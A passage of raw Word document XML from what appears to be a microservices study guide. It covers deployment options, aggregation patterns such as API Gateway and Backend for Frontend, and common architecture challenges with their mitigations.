          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for containerized microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B77EF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Functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for serverless deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03330E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Containerization and Orchestration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B77D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1251C5F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re typically packaged in Docker containers. This allows for portability across environments, such as local development, staging, and production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66234E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Kubernetes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738919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is the most common tool for orchestrating containerized microservices. It handles service discovery, load balancing, scaling, and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB123C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Kubernetes clusters can be deployed on cloud platforms like AWS (EKS), Azure (AKS), GCP (GKE), or on-premise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB7291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 Swarm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B04B6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to Kubernetes for orchestrating Docker containers, though less feature-rich.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364A2F93"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On-Premise Servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FDCD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VMs (Virtual Machines):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1698E88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can also be deployed on virtual machines that are either part of on-premise infrastructure or on private clouds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031E09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are Metal Servers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3265B18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organizations with high performance or special security needs may opt to deploy microservices on dedicated servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02592C3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Serverless Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320126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Lambda, Azure Functions, Google Cloud Functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71328A6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For event-driven applications or microservices that need to scale automatically, serverless options can be considered. Each service or function can scale up or down based on demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF4ABE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CD Pipelines:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5774453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Jenkins, GitLab CI, or GitHub Actions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228F35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ntinuous Integration/Continuous Deployment (CI/CD) tools can automate the deployment of microservices across different environments, including staging and production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF416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ypically, microservices are built and tested through CI/CD pipelines, and once they pass, they are deployed into a Kubernetes cluster or a cloud platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311615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Mesh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3740F4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stio, Linkerd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E16CC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ervice mesh provides additional functionalities like monitoring, traffic routing, and security for microservices running in a Kubernetes cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5017C8C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helps manage the complexity of interactions between microservices by providing observability and routing rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7DEE4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Edge and Hybrid Deployments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692BFDC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dge Computing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B39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microservices are deployed closer to users, in edge computing locations, to reduce latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F47AC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ybrid Clouds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB95DF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ome organizations deploy microservices in both public and private clouds to meet specific compliance or performance needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3157A2A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8. Platform-as-a-Service (PaaS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A06CD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eroku:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420C97B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for deploying microservices that abstracts infrastructure management. It’s often used for smaller projects or early-stage applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7824768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loud Foundry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E51F3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loud-native platform for deploying microservices. It offers more control than PaaS like Heroku but with less complexity than Kubernetes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA938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34E37CC">
          <v:rect id="_x0000_i3065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2329D3F8"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mon Deployment Strategy for Microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B5A0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izing Microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DEB6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Package each microservice in its own Docker container, ensuring that each microservice has its dependencies bundled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0620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ing Kubernetes or Docker Swarm for Orchestration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051E0E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Kubernetes for automatic scaling, rolling updates, and load balancing across microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D16EBE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I/CD Pipeline for Automation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364A7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 CI/CD pipeline to automate the building, testing, and deployment of microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E544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0EA3BC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an API Gateway (e.g.,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to route requests to the appropriate microservice and handle concerns like rate limiting, security, and load balancing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A880CA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Discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105979C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dynamic service discovery, allowing microservices to register and locate each other at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A1490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ABF5CFB">
          <v:rect id="_x0000_i3066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7AFF1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 summary</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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3067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="127A6ED6" w14:textId="4481A28D" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="728" w:name="_Toc197867942"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are different Aggregation patterns in Microservices</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="728"/>
    </w:p>
    <w:p w14:paraId="6B7291D4" w14:textId="4DF4B69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In microservices architecture, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aggregation patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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API Gateway Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9822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client-facing applications where different services need to be accessed through a single entry point. It simplifies client interactions with multiple services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0590908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60676E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makes a request to the API Gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C0AD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PI Gateway calls different microservices in the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1608467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ggregates the responses from these services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5684798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urns a unified response to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33372DA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7128772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the complexity for clients, as they only need to interact with a single endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38706D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entralizes routing and aggregation logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E994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2BB9D7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bottleneck if the API Gateway becomes overloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629512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PI Gateway may become a single point of failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C023F7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F0727C">
          <v:rect id="_x0000_i3068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D49B07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Backend for Frontend (BFF) Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0499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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Suitable when different frontends (e.g., mobile vs web) require different data or aggregation logic. It helps in avoiding over-fetching or under-fetching of data for each client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A98584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17F5D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frontend (mobile, web) has its own BFF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2783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BFF calls microservices and aggregates the necessary data specifically for the frontend it is serving.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF3AAB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ggregated response is sent back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8F5A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mobile app and a web app might have different UI needs. A mobile app BFF might aggregate data from User Service, Profile Service, and Order Service differently than the web app BFF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362543D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4EA76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llows customization of responses tailored to each frontend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623467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voids unnecessary data fetching and complex responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12543D2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44BB7BF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dds overhead in maintaining separate backend logic for each frontend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678F179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4CD0D">
          <v:rect id="_x0000_i3069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7789789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hained Call Pattern (or Direct Aggregation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE4062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services are tightly coupled and there is a need to aggregate data from different services for a single request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9390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4E2D371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37A71B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calls to other services in a sequence (or parallel).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CEA6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service returns part of the data, which is then aggregated into a single response and sent back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DAF9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User Profile service calls a User Info Service, User Preferences Service, and Order History Service sequentially to compile the complete user profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159718C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609D8E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e to implement when the service dependencies are limited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17686F1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ables fine-grained control over the aggregation process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7BC1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52BF9D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introduce latency due to multiple sequential service calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0CB5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service could disrupt the entire aggregation process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E95B98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B1B2291">
          <v:rect id="_x0000_i3070" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FA36B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Parallel Call Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A130F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multiple services are called in parallel to fetch different pieces of data. Once all services respond, their results are aggregated and returned to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284C8A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use cases where data from different microservices can be fetched concurrently, reducing overall latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B75D4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2645B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2F0DA2C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parallel calls to other microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392AA82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nce all responses are received, they are aggregated and sent back to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34819D4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Customer Profile service fetches data from Order Service, Shipping Service, and Inventory Service in parallel, then aggregates the responses into a single view of the customer profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7CC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2C28A6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overall latency by making concurrent calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8170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efficient than sequential calls when services are independent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B781B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8F95B7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issues if services depend on each other or if one service fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5136F7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quires proper error handling and coordination between parallel calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C906C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0A1361">
          <v:rect id="_x0000_i3071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1528E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Event-Driven Aggregation Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFEDE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asynchronous systems where real-time aggregation is not required, and the system needs to react to data changes across multiple services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0CFE9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38FD8A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publish events to a messaging system when relevant data is updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5078150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ther services subscribe to these events, fetch the necessary data, and aggregate it asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CB7F8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1AD1C44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ecouples services, improving flexibility and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C648B3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upports asynchronous communication and eventual consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383DED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ADED1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lead to complex event flows and tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111FD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ay require additional infrastructure (message brokers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C886D4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965013">
          <v:rect id="_x0000_i3072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D5F8B0"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Composite Service Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B27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A composite service aggregates responses from different microservices, typically using orchestration within a single service that coordinates multiple service calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8CDC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you need to orchestrate complex business logic or interactions between multiple microservices to fulfill a single request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E870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536DEF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omposite service acts as a single endpoint that is responsible for coordinating calls to multiple microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051435A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aggregates data from these services and performs additional logic before returning the final response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735AD03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Product Service calls Inventory Service, Pricing Service, and Shipping Service to compile the product's full details (price, availability, and shipping options).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF2763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59AE0A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ifies complex workflows by centralizing orchestration logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DB67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sures business rules are adhered to in the aggregation process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E763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75DA9AF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ould lead to a bottleneck if the composite service becomes too complex or overloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E77AE0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Increased risk of failure in case one service is down or slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305B1FBA"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8AA898">
          <v:rect id="_x0000_i3073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DCE1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5EBE688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Each aggregation pattern has its strengths and weaknesses, and the choice of pattern depends on the specific use case, latency requirements, scalability, and complexity of the microservices involved.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Backend for Frontend (BFF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> patterns are commonly used for client-facing aggregation, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event-Driven Ag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omposite Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are suited for more asynchronous or complex use cases. Understanding these patterns will help you design efficient and scalable microservices architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6C587F" w14:textId="44900E7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3074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB2F991" w14:textId="61698E9B" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="729" w:name="_Toc197867943"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are challenges in Microservice architecture</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="729"/>
    </w:p>
    <w:p w14:paraId="1AE96ACC" w14:textId="6B60A64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omplexity in Service Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7299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volve multiple services, each with its own database and lifecycle. Managing many services can become complex, especially when the number of services grows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DFCC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operational overhead, complexity in monitoring, and difficulty in debugging and troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B1754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Implement service discovery, centralized logging, and monitoring tools (e.g., Prometheus, Grafana, ELK stack) to manage complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ED8AF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092C0E9">
          <v:rect id="_x0000_i3075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF94C4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Inter-Service Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F0D1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Communication delays, network congestion, and complex error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334B19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Use asynchronous messaging, service meshes (e.g., Istio), or API gateways to streamline inter-service communication. Implement retries, circuit breakers, and timeouts for fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630E2CB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8FF7F2A">
          <v:rect id="_x0000_i3076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D767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Data Management and Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA53B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Challenge</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each microservice typically manages its own database, which can lead to data duplication and the need for eventual consistency across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EEE3A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ata inconsistency, challenges in managing transactions (especially in distributed systems), and difficulties in querying across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179FE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patterns like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event Sourc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QRS (Command Query Responsibility Se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handle distributed transactions and eventual consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B69B5D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CBE43E6">
          <v:rect id="_x0000_i3077" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="517299E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Distributed Transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348628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Ensuring data consistency in distributed systems is difficult. Traditional ACID transactions don’t work well in microservices since each service has its own database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C7CA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ies in maintaining consistency, especially when a service fails in the middle of a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA08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eventual consistency and approaches like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manage distributed transactions without relying on ACID properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3613215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A3FC000">
          <v:rect id="_x0000_i3078" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F38A6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Testing and Debugging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1810A1C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Testing microservices can be difficult because you need to test interactions between multiple services, both independently and as a whole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B10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complexity in writing and maintaining tests, especially for integration and end-to-end testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165139B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service virtualiz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mocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Implement automated testing strategies like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>uni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ntegration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 xml:space="preserve"> for the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451F72A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AB573A0">
          <v:rect id="_x0000_i3079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="627E3659"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Deployment and Versioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF7F1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Risks of version incompatibilities, broken deployments, and downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CFF9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rolling deployments, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Blue-Gree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anary deployments</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and manage service versioning carefully to ensure backward compatibility and smooth deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A7229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E21A0BC">
          <v:rect id="_x0000_i3080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE619A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Monitoring and Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F73C5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any services interacting in a microservices architecture, it becomes difficult to track the state and health of the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775E878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undetected issues, especially in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008278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entralized logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., ELK stack), </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed tracing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Jaeger, Zipkin), and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metrics collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Prometheus) to track and monitor microservices. Implement automated alerting based on predefined thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867B90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201D71">
          <v:rect id="_x0000_i3081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E313F5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ecurity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3256F79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crease the attack surface since each service exposes its own API, often communicating over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D65CA1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security breaches and difficulties in securing each service individually.</w:t>
